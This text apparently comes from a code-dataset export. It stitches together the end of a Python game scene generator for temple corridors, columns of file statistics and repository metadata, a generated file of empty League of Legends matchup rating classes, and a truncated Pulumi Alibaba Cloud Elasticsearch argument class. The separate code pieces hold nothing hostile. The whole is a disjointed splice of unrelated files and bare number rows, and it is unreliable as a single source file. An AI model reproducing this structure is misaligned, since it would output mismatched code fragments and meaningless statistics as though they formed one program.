    # trigger_list; they are dropped here as dead code. This assumes
    # generator.makeTrigger has no externally visible side effects -- confirm.

    def scene_gen_temple_corridor_01_00001(callback):
        """Generate corridor 01: a scene with five connection slots."""
        collision_data_list = [207, 255, 127, 252, 195, 255, 15, 31, 240, 255, 3, 7, 252, 255, 192, 1, 51, 51, 112, 192, 204, 12, 28, 48, 51, 3, 7, 204, 204, 192, 1, 0, 0, 112, 0, 0, 0, 28, 0, 0, 0, 7, 0, 0, 192, 1, 0, 0, 112, 0, 0, 0, 12, 0, 0, 0, 3, 0, 0, 192, 0, 0, 0, 0, 0, 0, 0, 0]
        bkg = generator.makeBackground("corridors_01.png")
        scn = generator.makeScene("_gen_temple_corridor_01", bkg, collisions=collision_data_list, actors=[], triggers=[], scene_label="scene_gen_temple_corridor_01_00001")
        connections = [
            _connection(scn['id'], (14, 5), 'down', (10, 4), (10, 1), ['B']),
            _connection(scn['id'], (1, 16), 'right', (0, 14), (1, 4), ['B']),
            _connection(scn['id'], (27, 17), 'left', (29, 16), (1, 2), ['B']),
            _connection(scn['id'], (4, 1), 'down', (4, 0), (2, 1), ['B']),
            _connection(scn['id'], (24, 1), 'down', (23, 0), (3, 1), ['B']),
        ]
        return _scene_data(scn, bkg, connections)

    def scene_gen_temple_corridor_02_00002(callback):
        """Generate corridor 02: a scene with two connection slots."""
        collision_data_list = [255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 3, 252, 3, 0, 60, 0, 192, 255, 240, 255, 15, 255, 255, 240, 255, 15, 255, 255, 240, 255, 15, 255, 255, 240, 255, 15, 255, 255, 240, 255, 15, 255, 255, 240, 255, 15, 255, 255, 240, 255, 15, 255, 255, 240, 255, 15, 255, 255, 240, 255, 15, 255, 255, 240, 255, 15, 255, 255, 240, 255, 15, 255]
        bkg = generator.makeBackground("corridors_02.png")
        scn = generator.makeScene("_gen_temple_corridor_02", bkg, collisions=collision_data_list, actors=[], triggers=[], scene_label="scene_gen_temple_corridor_02_00002")
        connections = [
            _connection(scn['id'], (9, 6), 'down', (6, 5), (8, 1), ['B']),
            _connection(scn['id'], (9, 28), 'up', (8, 29), (4, 1), ['B']),
        ]
        return _scene_data(scn, bkg, connections)

    def scene_gen_temple_corridor_03_00003(callback):
        """Generate corridor 03: a scene with three connection slots."""
        collision_data_list = [255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 15, 255, 207, 48, 255, 12, 243, 207, 48, 255, 12, 243, 207, 48, 63, 0, 192, 3, 0, 60, 0, 192, 3, 0, 60, 0, 192, 3, 0, 60, 0, 192, 0, 0, 15, 0, 240, 0, 0, 15, 0, 240, 3, 51, 63, 48, 243, 3, 51, 63, 48, 243, 63, 0, 255, 3, 240, 63, 0, 255, 3, 240]
        bkg = generator.makeBackground("corridors_03.png")
        scn = generator.makeScene("_gen_temple_corridor_03", bkg, collisions=collision_data_list, actors=[], triggers=[], scene_label="scene_gen_temple_corridor_03_00003")
        connections = [
            _connection(scn['id'], (9, 6), 'down', (8, 5), (4, 1), ['B']),
            _connection(scn['id'], (1, 20), 'right', (0, 18), (1, 4), ['B']),
            _connection(scn['id'], (10, 28), 'up', (6, 29), (10, 1), ['B']),
        ]
        return _scene_data(scn, bkg, connections)

    def scene_gen_temple_corridor_04_00004(callback):
        """Generate corridor 04: a scene with three connection slots."""
        collision_data_list = [255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 252, 15, 12, 12, 12, 0, 3, 3, 3, 192, 192, 192, 0, 48, 48, 48, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 63]
        bkg = generator.makeBackground("corridors_04.png")
        scn = generator.makeScene("_gen_temple_corridor_04", bkg, collisions=collision_data_list, actors=[], triggers=[], scene_label="scene_gen_temple_corridor_04_00004")
        connections = [
            _connection(scn['id'], (1, 11), 'right', (0, 6), (1, 10), ['B']),
            _connection(scn['id'], (27, 11), 'left', (29, 6), (1, 10), ['B']),
            _connection(scn['id'], (18, 6), 'down', (18, 5), (2, 1), ['B']),
        ]
        return _scene_data(scn, bkg, connections)

    def scene_gen_temple_corridor_05_00005(callback):
        """Generate corridor 05: a scene with three connection slots (tag 'A')."""
        collision_data_list = [255, 255, 129, 224, 255, 127, 32, 248, 231, 31, 8, 2, 0, 0, 130, 0, 0, 128, 32, 0, 0, 32, 8, 0, 0, 8, 2, 0, 0, 130, 0, 0, 128, 32, 0, 0, 32, 8, 0, 0, 8, 254, 255, 255, 131, 255, 127, 248, 224, 255, 31, 62, 248, 255, 135, 15, 2, 0, 0, 128, 0, 0, 0, 32, 0, 0, 0, 8]
        bkg = generator.makeBackground("corridors_05.png")
        scn = generator.makeScene("_gen_temple_corridor_05", bkg, collisions=collision_data_list, actors=[], triggers=[], scene_label="scene_gen_temple_corridor_05_00005")
        connections = [
            _connection(scn['id'], (1, 8), 'right', (0, 3), (1, 8), ['A']),
            _connection(scn['id'], (19, 1), 'down', (17, 0), (6, 1), ['A']),
            _connection(scn['id'], (7, 3), 'down', (7, 2), (2, 1), ['A']),
        ]
        return _scene_data(scn, bkg, connections)

    def scene_gen_temple_corridor_06_00006(callback):
        """Generate corridor 06: a scene with two connection slots."""
        collision_data_list = [255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 128, 16, 0, 8, 1, 128, 16, 0, 8, 1, 128, 16, 0, 8, 1, 128, 16, 0, 8, 1, 128, 16, 0, 8, 1, 128, 16, 0, 8, 1, 128, 16, 240, 15, 255, 255, 240, 255, 15, 255, 255, 240, 15, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
        bkg = generator.makeBackground("corridors_06.png")
        scn = generator.makeScene("_gen_temple_corridor_06", bkg, collisions=collision_data_list, actors=[], triggers=[], scene_label="scene_gen_temple_corridor_06_00006")
        connections = [
            _connection(scn['id'], (1, 16), 'right', (0, 6), (1, 13), ['B']),
            _connection(scn['id'], (17, 7), 'left', (19, 6), (1, 13), ['B']),
        ]
        return _scene_data(scn, bkg, connections)

    def catalog():
        """
        Returns a list of scene functions from this part of the library.
        """
        return [scene_gen_temple_corridor_01_00001,
                scene_gen_temple_corridor_02_00002,
                scene_gen_temple_corridor_03_00003,
                #scene_gen_temple_corridor_04_00004, # removed because I used it for SaveTheWorld
                scene_gen_temple_corridor_05_00005,
                #scene_gen_temple_corridor_06_00006 # removed because I used it for SaveTheWorld
                ]

    return catalog, sprite_sheet_data
def createExampleProject():
    """
    Demonstration of how the scene generators in this file can be used.
    """
    project = generator.makeBasicProject()

    # Register the player's sprite sheet and point the project at it.
    player_sprite_sheet = generator.addSpriteSheet(project, "actor_animated.png", "actor_animated", "actor_animated")
    project.settings["playerSpriteSheetId"] = player_sprite_sheet["id"]

    # Instantiate every scene in the catalog and pull in its sprite sheets.
    catalog, sprites = scene_generation()
    scene_data_list = [build_scene(None) for build_scene in catalog()]
    project.spriteSheets.extend(sprites)

    # Wire the scenes together, then resolve references and add them.
    generator.connectScenesRandomlySymmetric(scene_data_list)
    for sdata in scene_data_list:
        generator.addSceneData(project, generator.translateReferences(sdata, scene_data_list))

    # Add some music
    project.music.append(generator.makeMusic("template", "template.mod"))

    # Set the starting scene and player spawn point.
    project.settings["startSceneId"] = project.scenes[0]["id"]
    project.settings["startX"] = 7
    project.settings["startY"] = 21
    return project
def runTest(test_dir):
    """Initialize the generator, build the example project, and write it to *test_dir*."""
    generator.initializeGenerator()
    generator.writeProjectToDisk(createExampleProject(), output_path=test_dir)
# test creating scenes...
if __name__ == '__main__':
    # Generate the test project into the default destination directory.
    runTest(test_generation_destination_path)
| 71.201681
| 386
| 0.660018
| 3,156
| 25,419
| 5.024715
| 0.075412
| 0.033674
| 0.039728
| 0.049187
| 0.840207
| 0.824253
| 0.776517
| 0.766427
| 0.754572
| 0.730988
| 0
| 0.087988
| 0.205476
| 25,419
| 356
| 387
| 71.401685
| 0.697118
| 0.030489
| 0
| 0.496324
| 1
| 0
| 0.147373
| 0.01626
| 0
| 0
| 0
| 0
| 0
| 1
| 0.110294
| false
| 0
| 0.007353
| 0
| 0.231618
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
cc8f631e0bfc20e58063cd540db728376616ec27
| 6,407
|
py
|
Python
|
loldib/getratings/models/NA/na_rakan/na_rakan_bot.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
loldib/getratings/models/NA/na_rakan/na_rakan_bot.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
loldib/getratings/models/NA/na_rakan/na_rakan_bot.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
from getratings.models.ratings import Ratings
# Placeholder rating-model classes for the NA-region Rakan (bot lane) matchup
# table: one empty subclass of the shared Ratings base per opposing champion.
# The class name encodes region_champion_role_opponent; all behavior comes
# from Ratings -- these subclasses exist only to give each matchup a distinct
# model identity. NOTE(review): file appears auto-generated; edit the
# generator, not these classes, if the champion list changes.
class NA_Rakan_Bot_Aatrox(Ratings):
    pass
class NA_Rakan_Bot_Ahri(Ratings):
    pass
class NA_Rakan_Bot_Akali(Ratings):
    pass
class NA_Rakan_Bot_Alistar(Ratings):
    pass
class NA_Rakan_Bot_Amumu(Ratings):
    pass
class NA_Rakan_Bot_Anivia(Ratings):
    pass
class NA_Rakan_Bot_Annie(Ratings):
    pass
class NA_Rakan_Bot_Ashe(Ratings):
    pass
class NA_Rakan_Bot_AurelionSol(Ratings):
    pass
class NA_Rakan_Bot_Azir(Ratings):
    pass
class NA_Rakan_Bot_Bard(Ratings):
    pass
class NA_Rakan_Bot_Blitzcrank(Ratings):
    pass
class NA_Rakan_Bot_Brand(Ratings):
    pass
class NA_Rakan_Bot_Braum(Ratings):
    pass
class NA_Rakan_Bot_Caitlyn(Ratings):
    pass
class NA_Rakan_Bot_Camille(Ratings):
    pass
class NA_Rakan_Bot_Cassiopeia(Ratings):
    pass
class NA_Rakan_Bot_Chogath(Ratings):
    pass
class NA_Rakan_Bot_Corki(Ratings):
    pass
class NA_Rakan_Bot_Darius(Ratings):
    pass
class NA_Rakan_Bot_Diana(Ratings):
    pass
class NA_Rakan_Bot_Draven(Ratings):
    pass
class NA_Rakan_Bot_DrMundo(Ratings):
    pass
class NA_Rakan_Bot_Ekko(Ratings):
    pass
class NA_Rakan_Bot_Elise(Ratings):
    pass
class NA_Rakan_Bot_Evelynn(Ratings):
    pass
class NA_Rakan_Bot_Ezreal(Ratings):
    pass
class NA_Rakan_Bot_Fiddlesticks(Ratings):
    pass
class NA_Rakan_Bot_Fiora(Ratings):
    pass
class NA_Rakan_Bot_Fizz(Ratings):
    pass
class NA_Rakan_Bot_Galio(Ratings):
    pass
class NA_Rakan_Bot_Gangplank(Ratings):
    pass
class NA_Rakan_Bot_Garen(Ratings):
    pass
class NA_Rakan_Bot_Gnar(Ratings):
    pass
class NA_Rakan_Bot_Gragas(Ratings):
    pass
class NA_Rakan_Bot_Graves(Ratings):
    pass
class NA_Rakan_Bot_Hecarim(Ratings):
    pass
class NA_Rakan_Bot_Heimerdinger(Ratings):
    pass
class NA_Rakan_Bot_Illaoi(Ratings):
    pass
class NA_Rakan_Bot_Irelia(Ratings):
    pass
class NA_Rakan_Bot_Ivern(Ratings):
    pass
class NA_Rakan_Bot_Janna(Ratings):
    pass
class NA_Rakan_Bot_JarvanIV(Ratings):
    pass
class NA_Rakan_Bot_Jax(Ratings):
    pass
class NA_Rakan_Bot_Jayce(Ratings):
    pass
class NA_Rakan_Bot_Jhin(Ratings):
    pass
class NA_Rakan_Bot_Jinx(Ratings):
    pass
class NA_Rakan_Bot_Kalista(Ratings):
    pass
class NA_Rakan_Bot_Karma(Ratings):
    pass
class NA_Rakan_Bot_Karthus(Ratings):
    pass
class NA_Rakan_Bot_Kassadin(Ratings):
    pass
class NA_Rakan_Bot_Katarina(Ratings):
    pass
class NA_Rakan_Bot_Kayle(Ratings):
    pass
class NA_Rakan_Bot_Kayn(Ratings):
    pass
class NA_Rakan_Bot_Kennen(Ratings):
    pass
class NA_Rakan_Bot_Khazix(Ratings):
    pass
class NA_Rakan_Bot_Kindred(Ratings):
    pass
class NA_Rakan_Bot_Kled(Ratings):
    pass
class NA_Rakan_Bot_KogMaw(Ratings):
    pass
class NA_Rakan_Bot_Leblanc(Ratings):
    pass
class NA_Rakan_Bot_LeeSin(Ratings):
    pass
class NA_Rakan_Bot_Leona(Ratings):
    pass
class NA_Rakan_Bot_Lissandra(Ratings):
    pass
class NA_Rakan_Bot_Lucian(Ratings):
    pass
class NA_Rakan_Bot_Lulu(Ratings):
    pass
class NA_Rakan_Bot_Lux(Ratings):
    pass
class NA_Rakan_Bot_Malphite(Ratings):
    pass
class NA_Rakan_Bot_Malzahar(Ratings):
    pass
class NA_Rakan_Bot_Maokai(Ratings):
    pass
class NA_Rakan_Bot_MasterYi(Ratings):
    pass
class NA_Rakan_Bot_MissFortune(Ratings):
    pass
class NA_Rakan_Bot_MonkeyKing(Ratings):
    pass
class NA_Rakan_Bot_Mordekaiser(Ratings):
    pass
class NA_Rakan_Bot_Morgana(Ratings):
    pass
class NA_Rakan_Bot_Nami(Ratings):
    pass
class NA_Rakan_Bot_Nasus(Ratings):
    pass
class NA_Rakan_Bot_Nautilus(Ratings):
    pass
class NA_Rakan_Bot_Nidalee(Ratings):
    pass
class NA_Rakan_Bot_Nocturne(Ratings):
    pass
class NA_Rakan_Bot_Nunu(Ratings):
    pass
class NA_Rakan_Bot_Olaf(Ratings):
    pass
class NA_Rakan_Bot_Orianna(Ratings):
    pass
class NA_Rakan_Bot_Ornn(Ratings):
    pass
class NA_Rakan_Bot_Pantheon(Ratings):
    pass
class NA_Rakan_Bot_Poppy(Ratings):
    pass
class NA_Rakan_Bot_Quinn(Ratings):
    pass
class NA_Rakan_Bot_Rakan(Ratings):
    pass
class NA_Rakan_Bot_Rammus(Ratings):
    pass
class NA_Rakan_Bot_RekSai(Ratings):
    pass
class NA_Rakan_Bot_Renekton(Ratings):
    pass
class NA_Rakan_Bot_Rengar(Ratings):
    pass
class NA_Rakan_Bot_Riven(Ratings):
    pass
class NA_Rakan_Bot_Rumble(Ratings):
    pass
class NA_Rakan_Bot_Ryze(Ratings):
    pass
class NA_Rakan_Bot_Sejuani(Ratings):
    pass
class NA_Rakan_Bot_Shaco(Ratings):
    pass
class NA_Rakan_Bot_Shen(Ratings):
    pass
class NA_Rakan_Bot_Shyvana(Ratings):
    pass
class NA_Rakan_Bot_Singed(Ratings):
    pass
class NA_Rakan_Bot_Sion(Ratings):
    pass
class NA_Rakan_Bot_Sivir(Ratings):
    pass
class NA_Rakan_Bot_Skarner(Ratings):
    pass
class NA_Rakan_Bot_Sona(Ratings):
    pass
class NA_Rakan_Bot_Soraka(Ratings):
    pass
class NA_Rakan_Bot_Swain(Ratings):
    pass
class NA_Rakan_Bot_Syndra(Ratings):
    pass
class NA_Rakan_Bot_TahmKench(Ratings):
    pass
class NA_Rakan_Bot_Taliyah(Ratings):
    pass
class NA_Rakan_Bot_Talon(Ratings):
    pass
class NA_Rakan_Bot_Taric(Ratings):
    pass
class NA_Rakan_Bot_Teemo(Ratings):
    pass
class NA_Rakan_Bot_Thresh(Ratings):
    pass
class NA_Rakan_Bot_Tristana(Ratings):
    pass
class NA_Rakan_Bot_Trundle(Ratings):
    pass
class NA_Rakan_Bot_Tryndamere(Ratings):
    pass
class NA_Rakan_Bot_TwistedFate(Ratings):
    pass
class NA_Rakan_Bot_Twitch(Ratings):
    pass
class NA_Rakan_Bot_Udyr(Ratings):
    pass
class NA_Rakan_Bot_Urgot(Ratings):
    pass
class NA_Rakan_Bot_Varus(Ratings):
    pass
class NA_Rakan_Bot_Vayne(Ratings):
    pass
class NA_Rakan_Bot_Veigar(Ratings):
    pass
class NA_Rakan_Bot_Velkoz(Ratings):
    pass
class NA_Rakan_Bot_Vi(Ratings):
    pass
class NA_Rakan_Bot_Viktor(Ratings):
    pass
class NA_Rakan_Bot_Vladimir(Ratings):
    pass
class NA_Rakan_Bot_Volibear(Ratings):
    pass
class NA_Rakan_Bot_Warwick(Ratings):
    pass
class NA_Rakan_Bot_Xayah(Ratings):
    pass
class NA_Rakan_Bot_Xerath(Ratings):
    pass
class NA_Rakan_Bot_XinZhao(Ratings):
    pass
class NA_Rakan_Bot_Yasuo(Ratings):
    pass
class NA_Rakan_Bot_Yorick(Ratings):
    pass
class NA_Rakan_Bot_Zac(Ratings):
    pass
class NA_Rakan_Bot_Zed(Ratings):
    pass
class NA_Rakan_Bot_Ziggs(Ratings):
    pass
class NA_Rakan_Bot_Zilean(Ratings):
    pass
class NA_Rakan_Bot_Zyra(Ratings):
    pass
| 15.364508
| 46
| 0.761667
| 972
| 6,407
| 4.59465
| 0.151235
| 0.216301
| 0.370802
| 0.463502
| 0.797582
| 0.797582
| 0
| 0
| 0
| 0
| 0
| 0
| 0.173404
| 6,407
| 416
| 47
| 15.401442
| 0.843278
| 0
| 0
| 0.498195
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.498195
| 0.00361
| 0
| 0.501805
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
|
0
| 7
|
aef1ea9de07acc572376bdac20627de47b216da0
| 88,415
|
py
|
Python
|
sdk/python/pulumi_alicloud/elasticsearch/instance.py
|
pulumi/pulumi-alicloud
|
9c34d84b4588a7c885c6bec1f03b5016e5a41683
|
[
"ECL-2.0",
"Apache-2.0"
] | 42
|
2019-03-18T06:34:37.000Z
|
2022-03-24T07:08:57.000Z
|
sdk/python/pulumi_alicloud/elasticsearch/instance.py
|
pulumi/pulumi-alicloud
|
9c34d84b4588a7c885c6bec1f03b5016e5a41683
|
[
"ECL-2.0",
"Apache-2.0"
] | 152
|
2019-04-15T21:03:44.000Z
|
2022-03-29T18:00:57.000Z
|
sdk/python/pulumi_alicloud/elasticsearch/instance.py
|
pulumi/pulumi-alicloud
|
9c34d84b4588a7c885c6bec1f03b5016e5a41683
|
[
"ECL-2.0",
"Apache-2.0"
] | 3
|
2020-08-26T17:30:07.000Z
|
2021-07-05T01:37:45.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['InstanceArgs', 'Instance']
# NOTE(review): auto-generated (tfgen) input-argument type for the
# elasticsearch Instance resource — kept token-identical; only docstrings
# and comments are touched here. Required constructor arguments are stored
# unconditionally via pulumi.set; optional ones only when a non-None value
# was supplied.
@pulumi.input_type
class InstanceArgs:
    def __init__(__self__, *,
                 data_node_amount: pulumi.Input[int],
                 data_node_disk_size: pulumi.Input[int],
                 data_node_disk_type: pulumi.Input[str],
                 data_node_spec: pulumi.Input[str],
                 version: pulumi.Input[str],
                 vswitch_id: pulumi.Input[str],
                 client_node_amount: Optional[pulumi.Input[int]] = None,
                 client_node_spec: Optional[pulumi.Input[str]] = None,
                 data_node_disk_encrypted: Optional[pulumi.Input[bool]] = None,
                 description: Optional[pulumi.Input[str]] = None,
                 enable_kibana_private_network: Optional[pulumi.Input[bool]] = None,
                 enable_kibana_public_network: Optional[pulumi.Input[bool]] = None,
                 enable_public: Optional[pulumi.Input[bool]] = None,
                 instance_charge_type: Optional[pulumi.Input[str]] = None,
                 kibana_private_whitelists: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 kibana_whitelists: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 kms_encrypted_password: Optional[pulumi.Input[str]] = None,
                 kms_encryption_context: Optional[pulumi.Input[Mapping[str, Any]]] = None,
                 master_node_spec: Optional[pulumi.Input[str]] = None,
                 password: Optional[pulumi.Input[str]] = None,
                 period: Optional[pulumi.Input[int]] = None,
                 private_whitelists: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 protocol: Optional[pulumi.Input[str]] = None,
                 public_whitelists: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 resource_group_id: Optional[pulumi.Input[str]] = None,
                 setting_config: Optional[pulumi.Input[Mapping[str, Any]]] = None,
                 tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
                 zone_count: Optional[pulumi.Input[int]] = None):
        """
        The set of arguments for constructing an Instance resource.
        :param pulumi.Input[int] data_node_amount: The Elasticsearch cluster's data node quantity, between 2 and 50.
        :param pulumi.Input[int] data_node_disk_size: The single data node storage space.
               - `cloud_ssd`: An SSD disk, supports a maximum of 2048 GiB (2 TB).
        :param pulumi.Input[str] data_node_disk_type: The data node disk type. Supported values: cloud_ssd, cloud_efficiency.
        :param pulumi.Input[str] data_node_spec: The data node specifications of the Elasticsearch instance.
        :param pulumi.Input[str] version: Elasticsearch version. Supported values: `5.5.3_with_X-Pack`, `6.3_with_X-Pack`, `6.7_with_X-Pack`, `6.8_with_X-Pack`, `7.4_with_X-Pack` and `7.7_with_X-Pack`.
        :param pulumi.Input[str] vswitch_id: The ID of VSwitch.
        :param pulumi.Input[int] client_node_amount: The Elasticsearch cluster's client node quantity, between 2 and 25.
        :param pulumi.Input[str] client_node_spec: The client node spec. If specified, client node will be created.
        :param pulumi.Input[bool] data_node_disk_encrypted: If encrypt the data node disk. Valid values are `true`, `false`. Default to `false`.
        :param pulumi.Input[str] description: The description of instance. It is a string of 0 to 30 characters.
        :param pulumi.Input[bool] enable_kibana_private_network: Bool, default to false. When it is set to true, the instance can close kibana private network access.
        :param pulumi.Input[bool] enable_kibana_public_network: Bool, default to true. When it is set to false, the instance can enable kibana public network access.
        :param pulumi.Input[bool] enable_public: Bool, default to false. When it is set to true, the instance can enable public network access.
        :param pulumi.Input[str] instance_charge_type: Valid values are `PrePaid`, `PostPaid`. Default to `PostPaid`. From version 1.69.0, the Elasticsearch cluster allows you to update your instance_charge_type from `PostPaid` to `PrePaid`, the following attributes are required: `period`. But, updating from `PostPaid` to `PrePaid` is not supported.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] kibana_private_whitelists: Set the Kibana's IP whitelist in private network.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] kibana_whitelists: Set the Kibana's IP whitelist in internet network.
        :param pulumi.Input[str] kms_encrypted_password: A KMS-encrypted password used for an instance. If the `password` is filled in, this field will be ignored, but you have to specify one of `password` and `kms_encrypted_password` fields.
        :param pulumi.Input[Mapping[str, Any]] kms_encryption_context: A KMS encryption context used to decrypt `kms_encrypted_password` before creating or updating instance with `kms_encrypted_password`. See [Encryption Context](https://www.alibabacloud.com/help/doc-detail/42975.htm). It is valid when `kms_encrypted_password` is set.
        :param pulumi.Input[str] master_node_spec: The dedicated master node spec. If specified, dedicated master node will be created.
        :param pulumi.Input[str] password: The password of the instance. The password can be 8 to 30 characters in length and must contain three of the following conditions: uppercase letters, lowercase letters, numbers, and special characters (`!@#$%^&*()_+-=`).
        :param pulumi.Input[int] period: The duration that you will buy Elasticsearch instance (in month). It is valid when instance_charge_type is `PrePaid`. Valid values: [1~9], 12, 24, 36. Default to 1. From version 1.69.2, when to modify this value, the resource can renewal a `PrePaid` instance.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] private_whitelists: Set the instance's IP whitelist in VPC network.
        :param pulumi.Input[str] protocol: Elasticsearch protocol. Supported values: `HTTP`, `HTTPS`. Default is `HTTP`.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] public_whitelists: Set the instance's IP whitelist in internet network.
        :param pulumi.Input[str] resource_group_id: The Id of resource group which the Elasticsearch instance belongs.
        :param pulumi.Input[Mapping[str, Any]] setting_config: The YML configuration of the instance.[Detailed introduction](https://www.alibabacloud.com/help/doc-detail/61336.html).
        :param pulumi.Input[Mapping[str, Any]] tags: A mapping of tags to assign to the resource.
               - key: It can be up to 128 characters in length. It cannot begin with "aliyun", "acs:". It cannot contain "http://" and "https://". It cannot be a null string.
               - value: It can be up to 128 characters in length. It cannot contain "http://" and "https://". It can be a null string.
        :param pulumi.Input[int] zone_count: The Multi-AZ supported for Elasticsearch, between 1 and 3. The `data_node_amount` value must be an integral multiple of the `zone_count` value.
        """
        # Required arguments: always stored.
        pulumi.set(__self__, "data_node_amount", data_node_amount)
        pulumi.set(__self__, "data_node_disk_size", data_node_disk_size)
        pulumi.set(__self__, "data_node_disk_type", data_node_disk_type)
        pulumi.set(__self__, "data_node_spec", data_node_spec)
        pulumi.set(__self__, "version", version)
        pulumi.set(__self__, "vswitch_id", vswitch_id)
        # Optional arguments: stored only when explicitly provided, so that
        # unset inputs stay absent rather than becoming explicit None values.
        if client_node_amount is not None:
            pulumi.set(__self__, "client_node_amount", client_node_amount)
        if client_node_spec is not None:
            pulumi.set(__self__, "client_node_spec", client_node_spec)
        if data_node_disk_encrypted is not None:
            pulumi.set(__self__, "data_node_disk_encrypted", data_node_disk_encrypted)
        if description is not None:
            pulumi.set(__self__, "description", description)
        if enable_kibana_private_network is not None:
            pulumi.set(__self__, "enable_kibana_private_network", enable_kibana_private_network)
        if enable_kibana_public_network is not None:
            pulumi.set(__self__, "enable_kibana_public_network", enable_kibana_public_network)
        if enable_public is not None:
            pulumi.set(__self__, "enable_public", enable_public)
        if instance_charge_type is not None:
            pulumi.set(__self__, "instance_charge_type", instance_charge_type)
        if kibana_private_whitelists is not None:
            pulumi.set(__self__, "kibana_private_whitelists", kibana_private_whitelists)
        if kibana_whitelists is not None:
            pulumi.set(__self__, "kibana_whitelists", kibana_whitelists)
        if kms_encrypted_password is not None:
            pulumi.set(__self__, "kms_encrypted_password", kms_encrypted_password)
        if kms_encryption_context is not None:
            pulumi.set(__self__, "kms_encryption_context", kms_encryption_context)
        if master_node_spec is not None:
            pulumi.set(__self__, "master_node_spec", master_node_spec)
        if password is not None:
            pulumi.set(__self__, "password", password)
        if period is not None:
            pulumi.set(__self__, "period", period)
        if private_whitelists is not None:
            pulumi.set(__self__, "private_whitelists", private_whitelists)
        if protocol is not None:
            pulumi.set(__self__, "protocol", protocol)
        if public_whitelists is not None:
            pulumi.set(__self__, "public_whitelists", public_whitelists)
        if resource_group_id is not None:
            pulumi.set(__self__, "resource_group_id", resource_group_id)
        if setting_config is not None:
            pulumi.set(__self__, "setting_config", setting_config)
        if tags is not None:
            pulumi.set(__self__, "tags", tags)
        if zone_count is not None:
            pulumi.set(__self__, "zone_count", zone_count)

    @property
    @pulumi.getter(name="dataNodeAmount")
    def data_node_amount(self) -> pulumi.Input[int]:
        """
        The Elasticsearch cluster's data node quantity, between 2 and 50.
        """
        return pulumi.get(self, "data_node_amount")

    @data_node_amount.setter
    def data_node_amount(self, value: pulumi.Input[int]):
        pulumi.set(self, "data_node_amount", value)

    @property
    @pulumi.getter(name="dataNodeDiskSize")
    def data_node_disk_size(self) -> pulumi.Input[int]:
        """
        The single data node storage space.
        - `cloud_ssd`: An SSD disk, supports a maximum of 2048 GiB (2 TB).
        """
        return pulumi.get(self, "data_node_disk_size")

    @data_node_disk_size.setter
    def data_node_disk_size(self, value: pulumi.Input[int]):
        pulumi.set(self, "data_node_disk_size", value)

    @property
    @pulumi.getter(name="dataNodeDiskType")
    def data_node_disk_type(self) -> pulumi.Input[str]:
        """
        The data node disk type. Supported values: cloud_ssd, cloud_efficiency.
        """
        return pulumi.get(self, "data_node_disk_type")

    @data_node_disk_type.setter
    def data_node_disk_type(self, value: pulumi.Input[str]):
        pulumi.set(self, "data_node_disk_type", value)

    @property
    @pulumi.getter(name="dataNodeSpec")
    def data_node_spec(self) -> pulumi.Input[str]:
        """
        The data node specifications of the Elasticsearch instance.
        """
        return pulumi.get(self, "data_node_spec")

    @data_node_spec.setter
    def data_node_spec(self, value: pulumi.Input[str]):
        pulumi.set(self, "data_node_spec", value)

    @property
    @pulumi.getter
    def version(self) -> pulumi.Input[str]:
        """
        Elasticsearch version. Supported values: `5.5.3_with_X-Pack`, `6.3_with_X-Pack`, `6.7_with_X-Pack`, `6.8_with_X-Pack`, `7.4_with_X-Pack` and `7.7_with_X-Pack`.
        """
        return pulumi.get(self, "version")

    @version.setter
    def version(self, value: pulumi.Input[str]):
        pulumi.set(self, "version", value)

    @property
    @pulumi.getter(name="vswitchId")
    def vswitch_id(self) -> pulumi.Input[str]:
        """
        The ID of VSwitch.
        """
        return pulumi.get(self, "vswitch_id")

    @vswitch_id.setter
    def vswitch_id(self, value: pulumi.Input[str]):
        pulumi.set(self, "vswitch_id", value)

    @property
    @pulumi.getter(name="clientNodeAmount")
    def client_node_amount(self) -> Optional[pulumi.Input[int]]:
        """
        The Elasticsearch cluster's client node quantity, between 2 and 25.
        """
        return pulumi.get(self, "client_node_amount")

    @client_node_amount.setter
